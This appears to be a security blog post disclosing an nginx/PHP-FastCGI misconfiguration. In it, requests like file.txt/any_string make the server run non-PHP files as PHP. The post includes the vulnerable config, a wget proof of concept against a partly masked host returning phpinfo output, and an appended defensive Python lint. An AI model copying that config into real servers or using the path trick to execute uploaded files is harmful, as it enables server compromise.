Yep, this is another configuration that triggers a hole. I found it, and it is a bit different
from the one from 80sec (http://www.80sec.com/nginx-securit.html).
For a fastcgi setting in nginx.conf like this (just an example):
============
fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
if (!-e $request_filename) {
rewrite ^(.+)$ /index.php?q=$1 last;
}
===========
where /home/any_user/public_html can be any path. The above setting is
a non-default nginx configuration.
Any requested file with an extension followed by an extra path component, like file.extension/any_string, will be
treated just like a PHP script,
ex: test.txt/any_string_without_php_extension
As an example, here we have a text file in /home/user/www:
==========================
root@host [/home/any_user_and_path/www]# cat tes.txt
====================
and any request for that test.txt like this:
==============================
http://domain.com/tes.txt/any_string_without_php_extension
=============================
will be treated as a PHP script.
OK, based on http://www.80sec.com/nginx-securit.html, the suggested patch is
in nginx.conf or in php.ini.
In nginx.conf, by adding:
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}
or in php.ini by setting cgi.fix_pathinfo=0.
Unfortunately this will not fix your hole when you have the wrong config above.
As I've checked, it is still treated as a PHP script:
===========
root@host [/usr/local/nginx/conf]# cat /usr/local/lib/php.ini | grep cgi.fix_pathinfo
; cgi.fix_pathinfo provides *real* PATH_INFO/PATH_TRANSLATED support for CGI. PHP's
cgi.fix_pathinfo=0
root@host [/usr/local/nginx/conf]# /etc/init.d/httpd restart
Restarting nginx daemon: nginxRemaining processes: 12091
root@host [/usr/local/nginx/conf]# wget http://***********.net/tes.jpg/any_string_without_extension
--08:35:00-- http://***********.net/tes.jpg/any_string_without_extension
=> `any_string_without_extension'
Resolving ***********.net... 204.197.248.127
Connecting to ***********.net|204.197.248.127|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[ <=> ] 46,064 --.--K/s
08:35:03 (9.38 MB/s) - `any_string_without_extension' saved [46064]
root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'PHP Version'
<a href="http://www.php.net/"><img border="0" src="/tes.jpg?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.2.17</h1>root@host [/usr/local/nginx/conf]# cat any_string_without_extension | grep 'safe_mode'
<tr><td class="e">safe_mode</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_exec_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">safe_mode_gid</td><td class="v">On</td><td class="v">On</td></tr>
<tr><td class="e">safe_mode_include_dir</td><td class="v"><i>no value</i></td><td class="v"><i>no value</i></td></tr>
<tr><td class="e">sql.safe_mode</td><td class="v">Off</td><td class="v">Off</td></tr>
<tr><td class="e">safe_mode_allowed_env_vars</td><td class="v">PHP_</td><td class="v">PHP_</td></tr>
<tr><td class="e">safe_mode_protected_env_vars</td><td class="v">LD_LIBRARY_PATH</td><td class="v">LD_LIBRARY_PATH</td></tr>
root@host [/usr/local/nginx/conf]#
=================================================
(Trust me, you must be very careful
when you set up nginx and fastcgi!!
A little mistake in the config will trigger a hole on your server.)
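As an added check, not part of the original post, here is a small Python lint that flags the two ingredients of the configuration above (SCRIPT_FILENAME built from $fastcgi_script_name, and the `if (!-e $request_filename)` rewrite to index.php) and, going beyond the post, an unanchored `location ~ \.php`. Both sample configs are constructed; the `location` block is not shown in the post, and the `try_files $uri =404` guard is the usual nginx recommendation, assumed here rather than taken from the post.

```python
import re

# Constructed sample modelled on the configuration in the post (plus a location block the post does not show).
RISKY_CONF = r"""
server {
    root /home/any_user/public_html;
    fastcgi_param SCRIPT_FILENAME /home/any_user/public_html$fastcgi_script_name;
    if (!-e $request_filename) {
        rewrite ^(.+)$ /index.php?q=$1 last;
    }
    location ~ \.php {
        fastcgi_pass 127.0.0.1:9000;
    }
}
"""

# Constructed hardened variant: PHP is only reached for URIs that exist as .php files.
SAFER_CONF = r"""
server {
    root /home/any_user/public_html;
    location ~ \.php$ {
        try_files $uri =404;   # assumed guard: 404 unless the .php file really exists
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass 127.0.0.1:9000;
    }
}
"""

def lint_fastcgi_conf(conf):
    """Return a list of findings for an nginx config text; empty means nothing flagged."""
    # Drop nginx comments so commented-out lines do not trigger findings.
    body = "\n".join(line.split("#", 1)[0] for line in conf.splitlines())
    findings = []
    script_name = re.search(r"fastcgi_param\s+SCRIPT_FILENAME\s+\S*\$fastcgi_script_name", body)
    guarded = re.search(r"try_files\s+\$uri\s+=404", body)
    if script_name and not guarded:
        findings.append("SCRIPT_FILENAME is built from $fastcgi_script_name without a try_files $uri =404 guard")
    catch_all = re.search(r"if\s*\(\s*!-e\s+\$request_filename\s*\)", body)
    rewrite_php = re.search(r"rewrite\s+\S+\s+/index\.php", body)
    if catch_all and rewrite_php:
        findings.append("if (!-e $request_filename) ... rewrite to /index.php hands every non-existent path to PHP")
    loc = re.search(r"location\s+~\s*\\\.php(\$?)", body)
    if loc and not loc.group(1):
        findings.append("location ~ \\.php is not anchored with $; it also matches /x.php.txt and /x.php/anything")
    return findings

if __name__ == "__main__":
    for name, conf in (("risky", RISKY_CONF), ("safer", SAFER_CONF)):
        print(name, lint_fastcgi_conf(conf) or ["no findings"])
```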
===========================
Special thanks to: Flyff666, Danzel, X-hack, Whitehat, P4, wenkhairu, badwolves , superman,
cakill, ketek, Smith, all Chinese and Indonesians and all my bro
===========================
1 comment:
Nice one Danzel !! contact me ;)